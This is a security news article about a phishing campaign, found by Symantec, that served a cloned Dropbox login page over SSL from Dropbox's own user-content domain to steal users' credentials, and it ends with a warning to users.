Dropbox Users scammed into handing over credentials through a Phishing Page sent over SSL

After the massive leak of 700,000 Dropbox userids and passwords, which Dropbox denies it has been stolen from their servers, people are wary about the Dropbox security.

It so happens that a new style of stealing Dropbox credentials has emerged.  Cyber criminals try steal credentials for Dropbox and web-based email service by having created a fake log-in page that is hosted on the file sharing website, taking advantage of its secure protocol.  This scam which was discovered by Symantec.

The modus operandi

As usual the potential victims receive a email with a subject stating it as ‘Important’ from known party (who has also been a victim). The email is said to contain a large file which can be view only over Dropbox. Once the victim clicks on the link, he/she is led to a clone Dropbox page where he/she is asked for their Dropbox credentials.

The problem with this clone Dropbox page is that it is served over a secure website containing the words https before the url and further contains a exact replica of the Dropbox logo.  This makes the victim believe they are on real Dropbox page and handover their credentials to cybercriminals.  The image which is given below is of the said page and can fool even die hard prudent user.

Dropbox 1.png

Log in pages served over a webpage using a secure protocol

As soon as the “sign in” button is hit, the username and password entered in the log in fields are delivered to a PHP script on a compromised server, Symantec’s Nick Johnston says in a blog post.

The master strategy of the cybercriminals to use a secure protocol to host their nefarious cloned site works in most cases. Sending the data to the machine accessed by the crooks is also carried out using the secure protocol, which does not raise any suspicion to the victim. Otherwise, since the fake page is accessed through an encrypted connection, the web browser would inform that an insecure communication channel is used for delivering the data, warning that it could be intercepted and read by a third-party.

Johnston adds in his blogpost that that not all the resources of the phishing page are delivered over SSL.  The non secure items are marked in the web browser left top part which will display a different padlock in the address bar conveying some parts of the page are unsecure. However seeing the padlock and the https at the start of the page is enough for most users and that puts them at a greater risk.

“The fake login page is hosted on Dropbox’s user content domain (like shared photos and other files are) and is served over SSL, making the attack more dangerous and convincing,” says the researcher.

This is not the first case of abusing Dropbox cloud storage service. In late August, an SMS phishing (smishing) campaign was observed relying on the same method, the difference being that the crooks delivered a fake/cloned Facebook page.

However given the scale of recent leaks which hit the cyberspace last week , user discretion is advised to avoid falling into such traps.